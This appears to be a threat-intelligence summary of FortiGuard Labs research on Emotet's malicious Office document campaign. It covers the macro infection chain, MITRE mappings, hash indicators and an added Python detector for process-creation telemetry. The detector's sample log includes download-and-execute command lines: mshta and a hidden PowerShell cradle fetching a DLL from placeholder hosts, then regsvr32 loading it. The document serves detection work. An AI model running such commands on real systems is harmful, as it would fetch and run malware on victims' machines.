FortiGuard Labs details Emotet’s maldoc outbreak, showing a multi‑stage infection chain via malicious Office files that deploy VBA/Excel 4.0 macros to drop and run Emotet payloads. The campaign escalated from November 2021 through March 2022, with Excel documents dominating the threat surface and a shift toward older macro techniques to evade detection.
Read more: https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak
Keypoints
- Emotet spreads via phishing emails with malicious Microsoft Office attachments (Word/Excel) that disguise themselves with “Re:” or “Fw:” in the subject line.
- Five samples tracked in the campaign show distinct macro types and file formats (VBA in Word/Excel, Excel 4.0 Macro, and mixed Excel/Word docs).
- Macros implement a chain: opening the document triggers code that creates and runs a VBS/PowerShell payload to fetch and execute Emotet DLLs.
- One technique uses Excel 4.0 Macro sheets with hidden tabs and Auto_Open to call URLDownloadToFileA, download a DLL (.ocx) and execute via regsvr32.
- Other samples leverage MSHTA/HTA and VBScript to decrypt and run PowerShell scripts that download and install Emotet DLLs via rundll32.
- From mid‑Nov 2021 to Mar 2022, the campaign showed sustained daily activity, with 2021NovW4 being the most active and Excel documents representing the vast majority of maldocs.
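The chain described in the key points above (Office document spawns a script host or LOLBin, mshta fetches a remote HTA, PowerShell downloads the DLL, regsvr32/rundll32 loads it from ProgramData) maps cleanly onto process-creation telemetry. The following is an added detection example written for this summary; it is not code from the FortiGuard Labs article. The log lines are constructed to resemble Sysmon Event ID 1 records flattened to key="value" text, and the field names (ParentImage, Image, CommandLine), hostnames and paths are assumptions for illustration.

```python
"""Flag process-creation events matching the Emotet maldoc execution chain.

Added example (not from the FortiGuard Labs article). Input is a list of
constructed, Sysmon-like process-creation records rendered as key="value"
pairs; field names are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe"}
SCRIPT_HOSTS_AND_LOLBINS = {
    "mshta.exe", "regsvr32.exe", "rundll32.exe",
    "powershell.exe", "wscript.exe", "cscript.exe",
}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
PROGRAMDATA_RE = re.compile(r"c:\\programdata\\", re.IGNORECASE)
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one key="value" record into a ProcessEvent (missing keys -> '')."""
    fields = dict(FIELD_RE.findall(line))
    return ProcessEvent(
        fields.get("ParentImage", ""),
        fields.get("Image", ""),
        fields.get("CommandLine", ""),
    )


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list[str]:
    """Return the names of every chain stage this event matches (may be empty)."""
    findings: list[str] = []
    parent, image, cmd = basename(ev.parent), basename(ev.image), ev.cmdline.lower()

    # Stage 1: an Office application spawning a script host or LOLBin
    # is the macro firing (T1059 / T1218 in the MITRE mapping above).
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS_AND_LOLBINS:
        findings.append(f"office_spawned_{image}")

    # Stage 2: mshta executing a remote URL (the Excel 4.0 formula technique).
    if image == "mshta.exe" and URL_RE.search(cmd):
        findings.append("mshta_remote_url")

    # Stage 3: PowerShell download cradle or encoded command.
    if image == "powershell.exe" and ("downloadfile" in cmd or "-enc" in cmd):
        findings.append("powershell_download_cradle")

    # Stage 4: regsvr32 / rundll32 loading a DLL or .ocx dropped under ProgramData.
    if image in {"regsvr32.exe", "rundll32.exe"} and PROGRAMDATA_RE.search(cmd):
        findings.append(f"{image[:-4]}_programdata_payload")

    return findings


def scan(lines: list[str]) -> dict[int, list[str]]:
    """Map line index -> findings for every line that triggers at least one rule."""
    results: dict[int, list[str]] = {}
    for idx, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            results[idx] = hits
    return results


# Constructed sample telemetry (hostnames use the reserved .invalid TLD).
SAMPLE_LOG = [
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" '
    'Image="C:\\Windows\\System32\\mshta.exe" '
    'CommandLine="mshta http://example.invalid/page.html"',
    'ParentImage="C:\\Windows\\System32\\wscript.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -w hidden (New-Object Net.WebClient).DownloadFile(http://payload.invalid/x.dll, C:\\ProgramData\\x.dll)"',
    'ParentImage="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'Image="C:\\Windows\\System32\\regsvr32.exe" '
    'CommandLine="regsvr32 /s C:\\ProgramData\\x.ocx"',
    # Benign: regsvr32 registering a system DLL from a normal parent.
    'ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\regsvr32.exe" '
    'CommandLine="regsvr32 /s C:\\Windows\\System32\\legit.dll"',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

Each rule is deliberately narrow (parent/child relationship, remote URL in an mshta command line, a loader pointed at ProgramData) so that an ordinary `regsvr32` registering a system DLL does not fire, while the three stages of the chain each produce their own finding that can be correlated by host and time.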
MITRE Techniques
- [T1566.001] Phishing – Spearphishing Attachment – Phishing emails with malicious Office attachments to trick victims; “The recent Emotet outbreak uses phishing emails combined with social engineering to trick victims into loading the malware onto their devices.”
- [T1059] Command and Scripting Interpreter – PowerShell and VBScript used to download and execute Emotet payloads; “PowerShell code snippet to download the Emotet malware dll into the ‘C:\ProgramData’ folder and then execute it using ‘regsvr32.exe’.”
- [T1059.005] VBScript – VBScript within a dropped VBS file used to orchestrate the PowerShell download and execution; “In the VBS file it generates a PowerShell code snippet…”
- [T1059.007] Visual Basic – Office macros (VBA) in Word/Excel used to trigger downloads and launches; “The attached Excel files and Word documents contain malicious macros.”
- [T1218] Signed Binary Proxy Execution – Mshta/Regsvr32/Rundll32 – “The simple formula uses mshta.exe to execute an HTML URL” and “emotet malware is executed using regsvr32.exe” and “executed with rundll32.exe.”
- [T1105] Ingress Tool Transfer – The macros fetch Emotet from remote URLs for installation; “download the Emotet malware from different URLs.”
Indicators of Compromise
- [SHA256] Malicious documents – 3e97f09fc53890ba2d5ae2539b5c8df372ed2506ed217d05ff2cf8899d15b8e6, 2ecc2a48fa4eadb80367f69799277c54a0fe6dd2220a6a2dd7b81cfba328ed19, and 6 more hashes
- [SHA256] Emotet malware payloads – 4900d1e66cef8507b265c0eec3ff94cb5f774847d969e044dc8ccd72334181f5, 2dcfcaaf3ccd8e06043e651cd5b761ae50f3463c6420d067b661969e0500dce2, and 6 more hashes